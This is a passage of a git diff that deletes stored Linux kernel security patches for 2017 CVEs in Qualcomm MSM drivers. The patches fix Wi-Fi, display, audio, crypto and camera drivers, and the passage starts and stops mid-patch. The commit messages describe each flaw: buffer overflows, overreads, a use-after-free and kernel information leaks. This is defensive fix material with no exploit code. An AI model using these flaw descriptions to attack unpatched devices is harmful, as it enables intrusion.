-diff --git a/core/sme/src/common/sme_ft_api.c b/core/sme/src/common/sme_ft_api.c
-index de4b656..f97b2e4 100644
---- a/core/sme/src/common/sme_ft_api.c
-+++ b/core/sme/src/common/sme_ft_api.c
-@@ -150,6 +150,7 @@ void sme_set_ft_ies(tHalHandle hal_ptr, uint32_t session_id,
- switch (session->ftSmeContext.FTState) {
- case eFT_START_READY:
- case eFT_AUTH_REQ_READY:
-+ sme_debug("ft_ies_length: %d", ft_ies_length);
- if ((session->ftSmeContext.auth_ft_ies) &&
- (session->ftSmeContext.auth_ft_ies_length)) {
- /* Free the one we recvd last from supplicant */
-@@ -157,6 +158,7 @@ void sme_set_ft_ies(tHalHandle hal_ptr, uint32_t session_id,
- session->ftSmeContext.auth_ft_ies_length = 0;
- session->ftSmeContext.auth_ft_ies = NULL;
- }
-+ ft_ies_length = QDF_MIN(ft_ies_length, MAX_FTIE_SIZE);
- /* Save the FT IEs */
- session->ftSmeContext.auth_ft_ies =
- qdf_mem_malloc(ft_ies_length);
-@@ -169,8 +171,6 @@ void sme_set_ft_ies(tHalHandle hal_ptr, uint32_t session_id,
- qdf_mem_copy((uint8_t *)session->ftSmeContext.auth_ft_ies,
-
ft_ies, ft_ies_length);
- session->ftSmeContext.FTState = eFT_AUTH_REQ_READY;
--
-- sme_debug("ft_ies_length: %d", ft_ies_length);
- break;
-
- case eFT_AUTH_COMPLETE:
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11040/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-11040/ANY/0001.patch
deleted file mode 100644
index 6e70834b..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11040/ANY/0001.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From 7a4d0eea0ca0c8a72111ae58d9829be817f102c9 Mon Sep 17 00:00:00 2001
-From: Ashish Garg
-Date: Fri, 9 Jun 2017 16:21:20 +0530
-Subject: msm: mdss: validate number of cea blocks before reading from edid_buf
-
-Number of cea blocks are read from edid buffer which comes from the
-user. If the number of cea blocks are more than the supported blocks
-kernel information leak is possible by reading more data than is
-present in edid_buf.
-
-Change-Id: I03b8456ff1e1a7b15d711f06908bd5c83f83cc02
-Signed-off-by: Ashish Garg
----
- drivers/video/fbdev/msm/mdss_hdmi_tx.c | 5 +++++
- 1 file changed, 5 insertions(+)
-
-diff --git a/drivers/video/fbdev/msm/mdss_hdmi_tx.c b/drivers/video/fbdev/msm/mdss_hdmi_tx.c
-index 4975aa2..9f897b4 100644
---- a/drivers/video/fbdev/msm/mdss_hdmi_tx.c
-+++ b/drivers/video/fbdev/msm/mdss_hdmi_tx.c
-@@ -632,6 +632,11 @@ static ssize_t hdmi_tx_sysfs_rda_edid(struct device *dev,
-
- mutex_lock(&hdmi_ctrl->tx_lock);
- cea_blks = hdmi_ctrl->edid_buf[EDID_BLOCK_SIZE - 2];
-+ if (cea_blks >= MAX_EDID_BLOCKS) {
-+ DEV_ERR("%s: invalid cea blocks\n", __func__);
-+ mutex_unlock(&hdmi_ctrl->tx_lock);
-+ return -EINVAL;
-+ }
- size = (cea_blks + 1) * EDID_BLOCK_SIZE;
- size = min_t(u32, size, PAGE_SIZE);
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11046/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-11046/ANY/0001.patch
deleted file mode 100644
index 497d4f6f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11046/ANY/0001.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From 5ff192e2c758298680b0c6cd364a55c59850901f Mon Sep 17 00:00:00 2001
-From: Vidyakumar Athota
-Date: Tue, 20 Jun 2017 16:39:00 -0700
-Subject: [PATCH] ASoC: msm: qdsp6v2: add size check to fix out of bounds issue
-
-Before calling audio calibration ioctl functions, compare the
-allocated buffer size to the size of the header and cal type header
-to ensure the buffer is big enough.
-
-Bug: 37623773
-Change-Id: I601bb37ddcc34d459c207cf579f29744fe912d7b
-Signed-off-by: Vidyakumar Athota
----
- sound/soc/msm/qdsp6v2/audio_calibration.c | 14 +++++++-------
- 1 file changed, 7 insertions(+), 7 deletions(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/audio_calibration.c b/sound/soc/msm/qdsp6v2/audio_calibration.c
-index 60d09dfaeb7f7..2a1b34776b686 100644
---- a/sound/soc/msm/qdsp6v2/audio_calibration.c
-+++ b/sound/soc/msm/qdsp6v2/audio_calibration.c
-@@ -453,6 +453,12 @@ static long audio_cal_shared_ioctl(struct file *file, unsigned int cmd,
- data->cal_type.cal_hdr.buffer_number);
- ret = -EINVAL;
- goto done;
-+ } else if ((data->hdr.cal_type_size + sizeof(data->hdr)) > size) {
-+ pr_err("%s: cal type hdr size %zd + cal type size %d is greater than user buffer size %d\n",
-+ __func__, sizeof(data->hdr), data->hdr.cal_type_size,
-+ size);
-+ ret = -EFAULT;
-+ goto done;
- }
-
-
-@@ -490,13 +496,7 @@ static long audio_cal_shared_ioctl(struct file *file, unsigned int cmd,
- goto unlock;
- if (data == NULL)
- goto unlock;
-- if ((sizeof(data->hdr) + data->hdr.cal_type_size) > size) {
-- pr_err("%s: header size %zd plus cal type size %d are greater than data buffer size %d\n",
-- __func__, sizeof(data->hdr),
-- data->hdr.cal_type_size, size);
-- ret = -EFAULT;
-- goto unlock;
-- } else if (copy_to_user((void *)arg, data,
-+ if (copy_to_user(arg, data,
- sizeof(data->hdr) + data->hdr.cal_type_size)) {
- pr_err("%s: Could not copy cal type to user\n",
- __func__);
diff --git a/Patches/Linux_CVEs/CVE-2017-11048/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-11048/ANY/0001.patch
deleted file mode 100644
index df7f27b5..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11048/ANY/0001.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From a42f6e19316e9e5aaaf8bd2c3bec25fde136dcaa Mon Sep 17 00:00:00 2001
-From: Jayant Shekhar
-Date: Thu, 22 Jun 2017 11:46:47 +0530
-Subject: [PATCH] msm: mdss: Increase fbmem buf ref count before use
-
-The reference count for fbmem buf is not increased before use,
-which means it can be get freed unintentionally when the reference
-count is decreased to "0". In this case, there is possibility of
-use after free. Ensure that fbmem buf refcount is incremented
-before use.
-
-Bug: 37093119
-Change-Id: I525d41e5496a1123e53a438b5f78d4da8bc046bd
-Signed-off-by: Jayant Shekhar
----
- drivers/video/msm/mdss/mdss_mdp_overlay.c | 5 ++++-
- 1 file changed, 4 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/video/msm/mdss/mdss_mdp_overlay.c b/drivers/video/msm/mdss/mdss_mdp_overlay.c
-index 86c6196432e10..4ab89d11d1daa 100644
---- a/drivers/video/msm/mdss/mdss_mdp_overlay.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_overlay.c
-@@ -3917,11 +3917,14 @@ static int mdss_fb_get_metadata(struct msm_fb_data_type *mfd,
- break;
- case metadata_op_get_ion_fd:
- if (mfd->fb_ion_handle) {
-+ get_dma_buf(mfd->fbmem_buf);
- metadata->data.fbmem_ionfd =
- dma_buf_fd(mfd->fbmem_buf, 0);
-- if (metadata->data.fbmem_ionfd < 0)
-+ if (metadata->data.fbmem_ionfd < 0) {
-+ dma_buf_put(mfd->fbmem_buf);
- pr_err("fd allocation failed. fd = %d\n",
- metadata->data.fbmem_ionfd);
-+ }
- }
- break;
- case metadata_op_crc:
diff --git a/Patches/Linux_CVEs/CVE-2017-11050/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-11050/qcacld-2.0/0001.patch
deleted file mode 100644
index 819a9ff6..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11050/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,45 +0,0 @@
-From 725674586f5bc009ef5175d29eb0fd677e0ef1f2 Mon Sep 17 00:00:00 2001
-From: "Poddar, Siddarth"
-Date: Mon, 3 Jul 2017 15:57:19 +0530
-Subject: qcacld-2.0: Restrict max/min pktlog buffer size using pktlogconf tool
-
-Restrict the pktlog buffer size to a minimum of 1MB and maximum
-of 16MB using pktlogconf tool or through sysctl command.
-
-CRs-Fixed: 2064785
-Change-Id: I2951de86de083b610bb114ff4b9ddcb51c4c3042
----
- CORE/UTILS/PKTLOG/pktlog_ac.c | 10 +++++++++-
- 1 file changed, 9 insertions(+), 1 deletion(-)
-
-diff --git a/CORE/UTILS/PKTLOG/pktlog_ac.c b/CORE/UTILS/PKTLOG/pktlog_ac.c
-index 823d2d5..679a78c 100644
---- a/CORE/UTILS/PKTLOG/pktlog_ac.c
-+++ b/CORE/UTILS/PKTLOG/pktlog_ac.c
-@@ -424,14 +424,22 @@ int pktlog_enable(struct ol_softc *scn, int32_t log_state)
- return error;
- }
-
-+#define ONE_MEGABYTE (1024 * 1024)
-+#define MAX_ALLOWED_PKTLOG_SIZE (16 * ONE_MEGABYTE)
-
- static int
- __pktlog_setsize(struct ol_softc *scn, int32_t size)
- {
- struct ol_pktlog_dev_t *pl_dev = scn->pdev_txrx_handle->pl_dev;
- struct ath_pktlog_info *pl_info = pl_dev->pl_info;
-- if (size < 0)
-+
-+ if (size < ONE_MEGABYTE || size > MAX_ALLOWED_PKTLOG_SIZE) {
-+ printk("%s: Cannot Set Pktlog Buffer size of %d bytes."
-+ "Min required is %d MB and Max allowed is %d MB.\n",
-+ __func__, size, (ONE_MEGABYTE/ONE_MEGABYTE),
-+ (MAX_ALLOWED_PKTLOG_SIZE/ONE_MEGABYTE));
- return -EINVAL;
-+ }
-
- if (size == pl_info->buf_size)
- return 0;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11051/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-11051/qcacld-2.0/0001.patch
deleted file mode 100644
index 3c8001fb..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11051/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From c8f263f0e3b0b6cba38fae9b2330d77f802c51d8 Mon Sep 17 00:00:00 2001
-From: Ashish Kumar Dhanotiya
-Date: Thu, 6 Jul 2017 16:51:53 +0530
-Subject: qcacld-2.0: Fix Uninitialized memory issue
-
-There is a possibility to read uninitialized memory within api
-__wlan_hdd_cfg80211_testmode.
-
-To resolve this issue, initilaize buffer hb_params with zero.
-
-Change-Id: Ia8061610a8c35aa7290177c0dcd2c5c36d9fcb35
-CRs-Fixed: 2061755
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index 20f127b..b19cfd8 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -28402,6 +28402,7 @@ static int __wlan_hdd_cfg80211_testmode(struct wiphy *wiphy,
- return -ENOMEM;
- }
-
-+ vos_mem_zero(hb_params, sizeof(tSirLPHBReq));
- vos_mem_copy(hb_params, buf, buf_len);
- smeStatus = sme_LPHBConfigReq((tHalHandle)(pHddCtx->hHal),
- hb_params,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11052/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-11052/qcacld-2.0/0001.patch
deleted file mode 100644
index 02939a76..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11052/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From c1ea8487f35d3f4dea574552afda6a1637f98bbb Mon Sep 17 00:00:00 2001
-From: Jeff Johnson
-Date: Thu, 15 Jun 2017 12:47:46 -0700
-Subject: qcacld-2.0: Properly validate QCA_WLAN_VENDOR_ATTR_NDP_IFACE_STR
-
-Currently the QCA_WLAN_VENDOR_ATTR_NDP_IFACE_STR nla_policy specifies
-a type of NLA_STRING, but the underlying implementation expects a
-NUL-terminated string. Update the policy to correctly use a type of
-NLA_NUL_STRING with the len updated to remove the allocation needed
-for the terminating NUL.
-
-Change-Id: Ic73241511ab73ae63fd7c1a8d6422da91931919c
-CRs-Fixed: 2061688
----
- CORE/HDD/src/wlan_hdd_nan_datapath.c | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_nan_datapath.c b/CORE/HDD/src/wlan_hdd_nan_datapath.c
-index 2a2e6e4..d29a23a 100644
---- a/CORE/HDD/src/wlan_hdd_nan_datapath.c
-+++ b/CORE/HDD/src/wlan_hdd_nan_datapath.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2016 The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2016-2017 The Linux Foundation. All rights reserved.
- *
- * Previously licensed under the ISC license by Qualcomm Atheros, Inc.
- *
-@@ -40,8 +40,8 @@ static const struct nla_policy
- qca_wlan_vendor_ndp_policy[QCA_WLAN_VENDOR_ATTR_NDP_PARAMS_MAX + 1] = {
- [QCA_WLAN_VENDOR_ATTR_NDP_SUBCMD] = { .type = NLA_U32 },
- [QCA_WLAN_VENDOR_ATTR_NDP_TRANSACTION_ID] = { .type = NLA_U16 },
-- [QCA_WLAN_VENDOR_ATTR_NDP_IFACE_STR] = { .type = NLA_STRING,
-- .len = IFNAMSIZ },
-+ [QCA_WLAN_VENDOR_ATTR_NDP_IFACE_STR] = { .type = NLA_NUL_STRING,
-+ .len = IFNAMSIZ - 1 },
- [QCA_WLAN_VENDOR_ATTR_NDP_SERVICE_INSTANCE_ID] = { .type = NLA_U32 },
- [QCA_WLAN_VENDOR_ATTR_NDP_CHANNEL] = { .type = NLA_U32 },
- [QCA_WLAN_VENDOR_ATTR_NDP_PEER_DISCOVERY_MAC_ADDR] = {
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11053/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-11053/qcacld-2.0/0001.patch
deleted file mode 100644
index 58d91137..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11053/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,40 +0,0 @@
-From 99c00329bc13c526305dc826950c2cc117e6725d Mon Sep 17 00:00:00 2001
-From: yeshwanth sriram guntuka
-Date: Mon, 3 Jul 2017 11:44:31 +0530
-Subject: qcacld-2.0: Fix kernel memory corruption
-
-Buffer overflow in ConvertQosMapsetFrame function
-when num_dscp_exceptions value is less than 16.
-
-Fix is to return from function if num_dscp_exceptions
-is less than 16.
-
-Change-Id: I2fcce60b7fe5e988348cee786e9a4d493d9512fe
-CRs-Fixed: 2061544
----
- CORE/SYS/legacy/src/utils/src/utilsParser.c | 4 +++-
- 1 file changed, 3 insertions(+), 1 deletion(-)
-
-diff --git a/CORE/SYS/legacy/src/utils/src/utilsParser.c b/CORE/SYS/legacy/src/utils/src/utilsParser.c
-index 6c99939..e64ce33 100644
---- a/CORE/SYS/legacy/src/utils/src/utilsParser.c
-+++ b/CORE/SYS/legacy/src/utils/src/utilsParser.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2011-2015 The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2011-2015, 2017 The Linux Foundation. All rights reserved.
- *
- * Previously licensed under the ISC license by Qualcomm Atheros, Inc.
- *
-@@ -706,6 +706,8 @@ void ConvertQosMapsetFrame(tpAniSirGlobal pMac, tSirQosMapSet* Qos, tDot11fIEQos
- tANI_U8 i,j=0;
- if (dot11fIE->num_dscp_exceptions > 58)
- dot11fIE->num_dscp_exceptions = 58;
-+ if (dot11fIE->num_dscp_exceptions < 16)
-+ return;
- Qos->num_dscp_exceptions = (dot11fIE->num_dscp_exceptions - 16)/2;
- for (i = 0; i < Qos->num_dscp_exceptions; i++)
- {
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11054/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-11054/qcacld-2.0/0001.patch
deleted file mode 100644
index 772c38c8..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11054/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,90 +0,0 @@
-From 4d9812973e8b12700afd8c3d6f36a94506ffb6fc Mon Sep 17 00:00:00 2001
-From: Jeff Johnson
-Date: Thu, 15 Jun 2017 10:51:02 -0700
-Subject: qcacld-2.0: Avoid overread when configuring MAC addresses
-
-Currently there are multiple cfg80211 vendor commands where MAC
-address attributes are defined in a nla_policy table with a type of
-NLA_UNSPEC but without a minimum length. Add the proper minimum length
-to avoid buffer overread.
-
-Change-Id: I11ff2bd813dc4e6784a7cdee66a0c10ca0e69fcf
-CRs-Fixed: 2061251
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 26 ++++++++++++++++++--------
- 1 file changed, 18 insertions(+), 8 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index 1ac1fc1..2ec3d68 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -841,7 +841,9 @@ wlan_hdd_extscan_config_policy[QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_
- [QCA_WLAN_VENDOR_ATTR_EXTSCAN_GET_CACHED_SCAN_RESULTS_CONFIG_PARAM_FLUSH] = { .type = NLA_U8 },
-
- [QCA_WLAN_VENDOR_ATTR_EXTSCAN_GET_CACHED_SCAN_RESULTS_CONFIG_PARAM_MAX] = { .type = NLA_U32 },
-- [QCA_WLAN_VENDOR_ATTR_EXTSCAN_AP_THRESHOLD_PARAM_BSSID] = { .type = NLA_UNSPEC },
-+ [QCA_WLAN_VENDOR_ATTR_EXTSCAN_AP_THRESHOLD_PARAM_BSSID] = {
-+ .type = NLA_UNSPEC,
-+ .len = HDD_MAC_ADDR_LEN},
- [QCA_WLAN_VENDOR_ATTR_EXTSCAN_AP_THRESHOLD_PARAM_RSSI_LOW] = { .type = NLA_S32 },
- [QCA_WLAN_VENDOR_ATTR_EXTSCAN_AP_THRESHOLD_PARAM_RSSI_HIGH] = { .type = NLA_S32 },
- [QCA_WLAN_VENDOR_ATTR_EXTSCAN_AP_THRESHOLD_PARAM_CHANNEL] = { .type = NLA_U32 },
-@@ -8080,7 +8082,9 @@ wlan_hdd_cfg80211_get_logger_supp_feature(struct wiphy *wiphy,
- static const struct nla_policy
- wlan_hdd_tdls_config_enable_policy[QCA_WLAN_VENDOR_ATTR_TDLS_ENABLE_MAX +1] =
- {
-- [QCA_WLAN_VENDOR_ATTR_TDLS_ENABLE_MAC_ADDR] = {.type = NLA_UNSPEC },
-+ [QCA_WLAN_VENDOR_ATTR_TDLS_ENABLE_MAC_ADDR] = {
-+ .type = NLA_UNSPEC,
-+ .len = HDD_MAC_ADDR_LEN},
-
[QCA_WLAN_VENDOR_ATTR_TDLS_ENABLE_CHANNEL] = {.type = NLA_S32 },
- [QCA_WLAN_VENDOR_ATTR_TDLS_ENABLE_GLOBAL_OPERATING_CLASS] =
- {.type = NLA_S32 },
-@@ -8092,15 +8096,18 @@ wlan_hdd_tdls_config_enable_policy[QCA_WLAN_VENDOR_ATTR_TDLS_ENABLE_MAX +1] =
- static const struct nla_policy
- wlan_hdd_tdls_config_disable_policy[QCA_WLAN_VENDOR_ATTR_TDLS_DISABLE_MAX +1] =
- {
-- [QCA_WLAN_VENDOR_ATTR_TDLS_DISABLE_MAC_ADDR] = {.type = NLA_UNSPEC },
--
-+ [QCA_WLAN_VENDOR_ATTR_TDLS_DISABLE_MAC_ADDR] = {
-+ .type = NLA_UNSPEC,
-+ .len = HDD_MAC_ADDR_LEN},
- };
-
- static const struct nla_policy
- wlan_hdd_tdls_config_state_change_policy[
- QCA_WLAN_VENDOR_ATTR_TDLS_STATE_MAX +1] =
- {
-- [QCA_WLAN_VENDOR_ATTR_TDLS_STATE_MAC_ADDR] = {.type = NLA_UNSPEC },
-+ [QCA_WLAN_VENDOR_ATTR_TDLS_STATE_MAC_ADDR] = {
-+ .type = NLA_UNSPEC,
-+ .len = HDD_MAC_ADDR_LEN},
- [QCA_WLAN_VENDOR_ATTR_TDLS_NEW_STATE] = {.type = NLA_U32 },
- [QCA_WLAN_VENDOR_ATTR_TDLS_STATE_REASON] = {.type = NLA_S32 },
- [QCA_WLAN_VENDOR_ATTR_TDLS_STATE_CHANNEL] = {.type = NLA_U32 },
-@@ -8113,7 +8120,9 @@ static const struct nla_policy
- wlan_hdd_tdls_config_get_status_policy[
- QCA_WLAN_VENDOR_ATTR_TDLS_GET_STATUS_MAX +1] =
- {
-- [QCA_WLAN_VENDOR_ATTR_TDLS_GET_STATUS_MAC_ADDR] = {.type = NLA_UNSPEC },
-+ [QCA_WLAN_VENDOR_ATTR_TDLS_GET_STATUS_MAC_ADDR] = {
-+ .type = NLA_UNSPEC,
-+ .len = HDD_MAC_ADDR_LEN},
- [QCA_WLAN_VENDOR_ATTR_TDLS_GET_STATUS_STATE] = {.type = NLA_U32 },
- [QCA_WLAN_VENDOR_ATTR_TDLS_GET_STATUS_REASON] = {.type = NLA_S32 },
- [QCA_WLAN_VENDOR_ATTR_TDLS_GET_STATUS_CHANNEL] = {.type = NLA_U32 },
-@@ -10761,8 +10770,9 @@ static int __wlan_hdd_cfg80211_wifi_logger_start(struct wiphy *wiphy,
- static const struct
- nla_policy
- qca_wlan_vendor_attr_policy[QCA_WLAN_VENDOR_ATTR_MAX+1] = {
-- [QCA_WLAN_VENDOR_ATTR_MAC_ADDR] =
-- { .type = NLA_BINARY, .len = VOS_MAC_ADDR_SIZE },
-+ [QCA_WLAN_VENDOR_ATTR_MAC_ADDR] = {
-+ .type = NLA_BINARY,
-+ .len = HDD_MAC_ADDR_LEN},
- };
-
- /**
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11055/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-11055/qcacld-2.0/0001.patch
deleted file mode 100644
index b152eb98..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11055/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,30 +0,0 @@
-From 708633ca627031373f5cc3ca2e8994e7d694905a Mon Sep 17 00:00:00 2001
-From: Jeff Johnson
-Date: Thu, 15 Jun 2017 09:24:17 -0700
-Subject: qcacld-2.0: Apply policy to fine time measurement
-
-Currently QCA_WLAN_VENDOR_ATTR_CONFIG_FINE_TIME_MEASUREMENT is not
-properly represented in the wlan_hdd_wifi_config_policy table, so add
-a proper initializer.
-
-Change-Id: I95ba66337c30cae67b23c9942b9360522ad60df0
-CRs-Fixed: 2061241
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index 6624176..1ac1fc1 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -9612,6 +9612,7 @@ wlan_hdd_wifi_config_policy[QCA_WLAN_VENDOR_ATTR_CONFIG_MAX
- [QCA_WLAN_VENDOR_ATTR_CONFIG_MODULATED_DTIM] = {.type = NLA_U32 },
- [QCA_WLAN_VENDOR_ATTR_CONFIG_STATS_AVG_FACTOR] = {.type = NLA_U16 },
- [QCA_WLAN_VENDOR_ATTR_CONFIG_GUARD_TIME] = {.type = NLA_U32 },
-+ [QCA_WLAN_VENDOR_ATTR_CONFIG_FINE_TIME_MEASUREMENT] = {.type = NLA_U32},
- [QCA_WLAN_VENDOR_ATTR_CONFIG_TX_RATE] = {.type = NLA_U16 },
- [QCA_WLAN_VENDOR_ATTR_CONFIG_CHANNEL_AVOIDANCE_IND] = {.type = NLA_U8 },
- [QCA_WLAN_VENDOR_ATTR_CONFIG_TX_MPDU_AGGREGATION] = {.type = NLA_U8 },
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11056/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-11056/ANY/0001.patch
deleted file mode 100644
index 306f3fe5..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11056/ANY/0001.patch
+++ /dev/null
@@ -1,93 +0,0 @@
-From d5481967f73c5448b9b2ae528a75faa0b040bc42 Mon Sep 17 00:00:00 2001
-From: mohamed sunfeer
-Date: Wed, 21 Jun 2017 15:21:58 +0530
-Subject: [PATCH] compat_qcedev: Fix accessing userspace memory in kernel space
-
-Use put_user API to write the data to userspace from kernel
-space to avoid accessing userspace memory directly in
-kernel space.
-
-Bug: 37893116
-Change-Id: I3f0b0f13e720c052c8c23dfb36ffaccc484369ec
-Signed-off-by: mohamed sunfeer
----
- drivers/crypto/msm/compat_qcedev.c | 10 +---------
- 1 file changed, 1 insertion(+), 9 deletions(-)
-
-diff --git a/drivers/crypto/msm/compat_qcedev.c b/drivers/crypto/msm/compat_qcedev.c
-index 97ae990b5378b..4b36e7343aff6 100644
---- a/drivers/crypto/msm/compat_qcedev.c
-+++ b/drivers/crypto/msm/compat_qcedev.c
-@@ -1,7 +1,7 @@
- /*
- * QTI CE 32-bit compatibility syscall for 64-bit systems
- *
-- * Copyright (c) 2014, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2014-2015, 2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -97,7 +97,6 @@ static int compat_get_qcedev_vbuf_info(
-
- for (i = 0; i < QCEDEV_MAX_BUFFERS; i++) {
- err |= get_user(vaddr, &vbuf32->src[i].vaddr);
-- vbuf->src[i].vaddr = NULL;
- err |= put_user(vaddr, (compat_uptr_t *)&vbuf->src[i].vaddr);
- err |= get_user(len, &vbuf32->src[i].len);
- err |= put_user(len, &vbuf->src[i].len);
-@@ -105,7 +104,6 @@ static int compat_get_qcedev_vbuf_info(
-
- for (i = 0; i < QCEDEV_MAX_BUFFERS; i++) {
- err |= get_user(vaddr, &vbuf32->dst[i].vaddr);
-- vbuf->dst[i].vaddr = NULL;
- err |= put_user(vaddr, (compat_uptr_t *)&vbuf->dst[i].vaddr);
- err |= get_user(len, &vbuf32->dst[i].len);
- err |= put_user(len, &vbuf->dst[i].len);
-@@ -123,7 +121,6 @@ static int compat_put_qcedev_vbuf_info(
-
- for (i = 0; i < QCEDEV_MAX_BUFFERS; i++) {
- err |= get_user(vaddr, (compat_uptr_t *)&vbuf->src[i].vaddr);
-- vbuf32->src[i].vaddr = 0;
- err |= put_user(vaddr, &vbuf32->src[i].vaddr);
- err |= get_user(len, &vbuf->src[i].len);
- err |= put_user(len, &vbuf32->src[i].len);
-@@ -131,7 +128,6 @@ static int compat_put_qcedev_vbuf_info(
-
- for (i = 0; i < QCEDEV_MAX_BUFFERS; i++) {
- err |= get_user(vaddr, (compat_uptr_t *)&vbuf->dst[i].vaddr);
-- vbuf32->dst[i].vaddr = 0;
- err |= put_user(vaddr, &vbuf32->dst[i].vaddr);
- err |= get_user(len, &vbuf->dst[i].len);
- err |= put_user(len, &vbuf32->dst[i].len);
-@@ -276,7 +272,6 @@ static int compat_get_qcedev_sha_op_req(
-
- for (i = 0; i < QCEDEV_MAX_BUFFERS; i++) {
- err |= get_user(vaddr, &data32->data[i].vaddr);
-- data->data[i].vaddr = 0;
- err |= put_user(vaddr, (compat_uptr_t *)&data->data[i].vaddr);
- err |= get_user(len, &data32->data[i].len);
- err |= put_user(len, &data->data[i].len);
-@@ -295,7 +290,6 @@ static int compat_get_qcedev_sha_op_req(
- err |= get_user(diglen, &data32->diglen);
- err |= put_user(diglen, &data->diglen);
- err |=
get_user(authkey, &data32->authkey);
-- data->authkey = NULL;
- err |= put_user(authkey, (compat_uptr_t *)&data->authkey);
- err |= get_user(authklen, &data32->authklen);
- err |= put_user(authklen, &data->authklen);
-@@ -322,7 +316,6 @@ static int compat_put_qcedev_sha_op_req(
-
- for (i = 0; i < QCEDEV_MAX_BUFFERS; i++) {
- err |= get_user(vaddr, (compat_uptr_t *)&data->data[i].vaddr);
-- data32->data[i].vaddr = 0;
- err |= put_user(vaddr, &data32->data[i].vaddr);
- err |= get_user(len, &data->data[i].len);
- err |= put_user(len, &data32->data[i].len);
-@@ -341,7 +334,6 @@ static int compat_put_qcedev_sha_op_req(
- err |= get_user(diglen, &data->diglen);
- err |= put_user(diglen, &data32->diglen);
- err |= get_user(authkey, (compat_uptr_t *)&data->authkey);
-- data32->authkey = 0;
- err |= put_user(authkey, &data32->authkey);
- err |= get_user(authklen, &data->authklen);
- err |= put_user(authklen, &data32->authklen);
diff --git a/Patches/Linux_CVEs/CVE-2017-11057/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-11057/ANY/0001.patch
deleted file mode 100644
index 8d6e9bd5..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11057/ANY/0001.patch
+++ /dev/null
@@ -1,84 +0,0 @@
-From 270bb9351889878dbfc87a6797886cb3caf42430 Mon Sep 17 00:00:00 2001
-From: kaiwang
-Date: Tue, 27 Jun 2017 19:29:03 +0800
-Subject: [PATCH] msm: camera: sensor:validating the flash initialization
- parameters
-
-Copying the flash initialization parameters from userspace memory to
-kernel memory and in turn checking for the validity of the flash
-initialization parameters pointer sent from userspace
-
-CRs-Fixed: 2059812
-Bug: 37949660
-Change-Id: I957c10959108eb08b263d439a9a449b90338b6db
-Signed-off-by: kaiwang
----
- .../msm/camera_v2/sensor/flash/msm_flash.c | 38 +++++++++++++++++-----
- 1 file changed, 30 insertions(+), 8 deletions(-)
-
